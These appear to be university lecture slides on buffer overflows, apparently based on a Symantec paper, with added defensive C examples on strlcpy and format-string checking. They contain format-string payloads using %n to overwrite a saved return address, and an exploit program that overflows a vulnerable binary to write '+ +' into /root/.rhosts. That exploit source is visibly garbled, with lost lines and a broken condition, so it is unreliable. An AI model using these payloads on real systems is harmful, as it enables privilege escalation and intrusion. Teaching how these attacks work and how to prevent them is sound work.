Author: Bonnie Hill

Buffer Overflow

• Symantec paper

CSE 891

Michigan State University Computer Science and Engineering

First Generation: Overflowing a Stack Buffer

    int i;

    void function(void)
    {
        char buffer[256];                /* create a 256-byte stack buffer */
        for (i = 0; i < 512; i++)        /* iterate 512 times: twice the buffer size */
            buffer[i] = 'A';             /* copy the letter A; bytes 256..511 land past the buffer */
    }


First Generation: Overflowing a Stack Buffer

Overflows occur in programs that do not verify the length of the data being copied into a buffer, usually because they use functions that do not bound the copy by the size of the destination buffer (e.g. strcpy). Many such functions have safer counterparts, such as strncpy, which takes an additional count parameter specifying the maximum number of bytes to copy.


BSD: a safer strlcpy is available

The strlcpy() and strlcat() functions provide a consistent, unambiguous API to help the programmer write more bullet-proof code. First and foremost, both strlcpy() and strlcat() guarantee to NUL-terminate the destination string for all strings where the given size is non-zero. Secondly, both functions take the full size of the destination string as a size parameter. In most cases this value is easily computed at compile time using the sizeof operator. Finally, neither strlcpy() nor strlcat() zero-fill their destination strings (other than the compulsory NUL to terminate the string).

Programmers who switch to relatively safe functions such as strncpy do not necessarily make their programs much more secure against overflows. Errors in counting the size of the buffer still occur, usually resulting in a single-byte overflow known as an off-by-one.
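The three slides above make a practical point that is easy to get wrong in code: strncpy bounds the copy but does not promise a terminator, strlcpy promises both, and the "- 1 for the NUL" arithmetic is exactly where off-by-ones creep in. The following is an added example, not code from the slides or from the Symantec paper; the names my_strlcpy, strncpy_terminates, bounded_copy and the two check helpers are this example's own, and my_strlcpy is a portable re-implementation of the BSD contract quoted above rather than the libc function.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not from the slides. Re-implementation of the BSD strlcpy()
 * contract: copy at most size-1 bytes, always NUL-terminate when size > 0,
 * and return strlen(src) so the caller can detect truncation (result >= size). */
size_t my_strlcpy(char *dst, const char *src, size_t size)
{
    size_t srclen = strlen(src);
    if (size > 0) {
        size_t n = srclen < size - 1 ? srclen : size - 1;
        memcpy(dst, src, n);
        dst[n] = '\0';
    }
    return srclen;
}

/* The strncpy pitfall: strncpy(dst, src, size) does not terminate dst when
 * strlen(src) >= size. Returns 1 if a NUL landed inside the size-byte region,
 * 0 if not (a later strlen or printf would read past the buffer), -1 if the
 * requested size exceeds the demo buffer. */
int strncpy_terminates(const char *src, size_t size)
{
    char buf[64];
    if (size > sizeof buf) return -1;
    memset(buf, 'X', sizeof buf);      /* poison the buffer so a missing NUL is visible */
    strncpy(buf, src, size);
    return memchr(buf, '\0', size) != NULL;
}

/* Bounded copy done carefully: reserve one byte for the terminator (the
 * off-by-one that "sizeof dst" without "- 1" gets wrong) and terminate
 * explicitly. Returns 1 if src fit completely, 0 if it was truncated. */
int bounded_copy(char *dst, size_t dstsize, const char *src)
{
    if (dstsize == 0) return 0;
    strncpy(dst, src, dstsize - 1);
    dst[dstsize - 1] = '\0';
    return strlen(src) < dstsize;
}

/* Check helpers: copy src into a size-byte buffer and compare with expect. */
int strlcpy_gives(const char *src, size_t size, const char *expect)
{
    char buf[64];
    if (size == 0 || size > sizeof buf) return 0;
    return my_strlcpy(buf, src, size) == strlen(src) && strcmp(buf, expect) == 0;
}

/* Returns bounded_copy's fit flag when the result matches expect, else -1. */
int bounded_copy_gives(const char *src, size_t size, const char *expect)
{
    char buf[64];
    int fit;
    if (size == 0 || size > sizeof buf) return -1;
    fit = bounded_copy(buf, size, src);
    return strcmp(buf, expect) == 0 ? fit : -1;
}

int main(void)
{
    printf("strncpy: 16 chars into 16 bytes, terminated? %d\n",
           strncpy_terminates("0123456789abcdef", 16));
    printf("strncpy: 15 chars into 16 bytes, terminated? %d\n",
           strncpy_terminates("0123456789abcde", 16));
    printf("my_strlcpy: 'hello world' into 8 bytes gives 'hello w'? %d\n",
           strlcpy_gives("hello world", 8, "hello w"));
    printf("bounded_copy: 'hello world' into 8 bytes fit? %d\n",
           bounded_copy_gives("hello world", 8, "hello w"));
    return 0;
}
```

The poisoned buffer in strncpy_terminates is the check worth copying into a unit test: a source exactly as long as the destination is the case that passes review by eye and fails at runtime.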


Second Generation: Off-by-One Overflows

myprog.exe AAAA%x%x%n

Examine the stack layout:

The first format specifier, %x, consumes what is considered the return address (0x401064); the next %x consumes 0x12FE84. Finally, %n attempts to write to the address given by the next DWORD on the stack, which is 0x41414141 (AAAA). This allows an attacker to write to arbitrary memory addresses.


%x%x%x%x%x%x%x%x%x%.622404x%.622400x%n\x7C\xFE\x12

This will cause printf to write the value 0x12FE84 (622404 + 622400 = 0x12FE84) to 0x12FE7C if the exploit code is two bytes long. This overwrites a saved return address, causing execution to proceed to 0x12FE84, which is where an attacker would place their exploit code.
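The two slides above show why an attacker-controlled format string is dangerous: %x reads the stack and %n writes to it. The defensive counterpart, as an added example that is not code from the slides or from the Symantec paper: a small checker that walks an untrusted string the way printf's parser would and counts conversion directives (flagging %n), next to the correct idiom of passing the string as an argument to a constant "%s" format. The names count_format_directives, directive_count, contains_percent_n, log_untrusted and rendered_unchanged are this example's own.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not from the slides. Count printf conversion directives in s.
 * "%%" is a literal percent sign and is not counted. Sets *has_n when a %n
 * directive (a write to memory) is present. Any count above zero means the
 * string must never reach printf as its format argument. */
int count_format_directives(const char *s, int *has_n)
{
    int count = 0;
    *has_n = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%')
            continue;
        p++;                                   /* look at the byte after '%' */
        if (*p == '%')
            continue;                          /* "%%": literal percent sign */
        if (*p == '\0')
            break;                             /* dangling '%' at end of string */
        /* skip flags, field width, precision and length modifiers */
        while (*p && strchr("-+ #0123456789.*hlLqjzt", *p))
            p++;
        if (*p == '\0')
            break;
        if (*p == 'n')
            *has_n = 1;
        count++;                               /* *p is the conversion character */
    }
    return count;
}

int directive_count(const char *s)
{
    int n;
    return count_format_directives(s, &n);
}

int contains_percent_n(const char *s)
{
    int n;
    count_format_directives(s, &n);
    return n;
}

/* The fix for the vulnerable pattern printf(user_input): the untrusted text is
 * an argument to a constant "%s" format, so its '%' bytes are copied literally
 * instead of being interpreted. Returns snprintf's result (length written). */
int log_untrusted(char *out, size_t outsize, const char *untrusted)
{
    return snprintf(out, outsize, "input: %s", untrusted);
}

/* Render untrusted through log_untrusted and report whether the text after
 * the "input: " prefix still equals the original, i.e. nothing was expanded. */
int rendered_unchanged(const char *untrusted)
{
    char out[128];
    if (strlen(untrusted) >= sizeof out - 7) return 0;
    if (log_untrusted(out, sizeof out, untrusted) < 0) return 0;
    return strcmp(out + 7, untrusted) == 0;
}

int main(void)
{
    /* constructed sample: the payload shape from the slides, used only as input */
    const char *payload = "AAAA%x%x%n";
    printf("directives: %d, contains %%n: %d\n",
           directive_count(payload), contains_percent_n(payload));
    printf("rendered through \"%%s\" unchanged: %d\n", rendered_unchanged(payload));
    return 0;
}
```

The checker is the kind of assertion a logging or input-validation layer can apply before a string is ever handed to a formatting function; the real fix is the "%s" idiom, and compiling with -Wformat-security (which warns on a non-literal format with no arguments) catches the vulnerable call pattern at build time.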


Exploit1.c

#include <stdio.h>      /* header names were lost on the page; these four cover the calls used below */
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#define ERROR -1
#define VULPROG "./vulnerable1"
#define VULFILE "/root/.rhosts"   /* the file 'buf' will be stored in */

/* get value of sp off the stack (used to calculate argv[1] address) */
u_long getesp()
{
    __asm__("movl %esp,%eax");    /* equiv. of 'return esp;' in C */
}

int main(int argc, char **argv)
{
    u_long addr;
    register int i;
    int mainbufsize;
    char *mainbuf, buf[DIFF+6+1] = "+ +\t# ";
    /* ------------------------------------------------------ */
    if (argc > (i * 8) & 255);    /* only this fragment of source lines 15-22 survives on the page */
    mainbufsize = strlen(buf) + strlen(VULPROG) + strlen(VULPROG) + strlen(VULFILE) + 13;
    mainbuf = (char *)malloc(mainbufsize);
    memset(mainbuf, 0, mainbufsize);
    snprintf(mainbuf, mainbufsize - 1, "echo '%s' | %s %s\n", buf, VULPROG, VULFILE);
    printf("Overflowing tmpaddr to point to 0x%lx, check %s after.\n\n", addr, VULFILE);
    system(mainbuf);
    return 0;
}